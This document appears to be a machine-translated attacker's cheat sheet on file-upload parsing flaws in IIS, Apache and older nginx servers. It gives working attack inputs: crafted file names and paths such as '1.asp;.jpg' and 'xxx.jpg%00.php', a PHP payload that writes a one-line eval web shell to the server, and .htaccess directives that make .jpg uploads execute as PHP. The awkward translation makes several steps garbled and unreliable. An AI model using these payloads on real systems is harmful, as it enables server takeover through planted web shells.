File parsing vulnerabilities: Some special file is iis, Apache, nginx interpreted as a script file format vulnerability in some cases
iis5.x & 6.0 vulnerabilities
1. Contents Parsing Vulnerability: /xxx.asp/ma.jpg
- Established under the website name for .asp, .asa folder, any files within the directory will be treated as asp file is parsed and executed, if you can control the path of the upload, you do not need to upload jpg renamed after you can get to the shell.
2. File Parsing Vulnerability: 1.asp; .jpg - Upload time, because the tail is jpg, so successful upload, execution time is not behind the implementation of the semicolon, as it is asp execution (Ethereal reform package)
Apache Parsing Vulnerability
- Apache is parsed from right to left, if left to continue to identify unrecognized
- For example 1.php.owf.rar, Apache unrecognized owf and rar, much of this file will be executed as php
- How to determine whether it was legal suffix: Upload a 1.php.rar.jpg test ... (to know the extension you add) to test the legality
iis7.0 / 7.5 / nginx <8.03 deformity Parsing Vulnerability
- Upload a name for the file contents 1.jpg
<?PHP fputs(fopen('xxx.php','w'),'<?php eval($_POST[a])?>');?>
- Access 1.jpg / .php, in this directory will produce a word Trojan xxx.php
nginx <8.03 null byte code execution vulnerability
- Embedded php code in the picture
- Performed by accessing xxx.jpg% 00.php
Apache's .htaccess file parsing vulnerability
If the test found in the .htaccess file can be uploaded and executed, then the opportunity came.
Create a 1.txt written the following code to open the Save As, Save as type to All Files
AddType application/x-httpd-php .jpg
or
<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
.Htaccess file documents in the meaning of the code is to upload the file suffix .jpg format in php format to parse the file.